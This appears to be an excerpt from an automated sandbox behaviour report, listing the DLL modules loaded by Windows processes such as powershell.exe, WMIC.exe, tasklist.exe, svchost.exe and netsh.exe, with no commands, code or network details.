Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
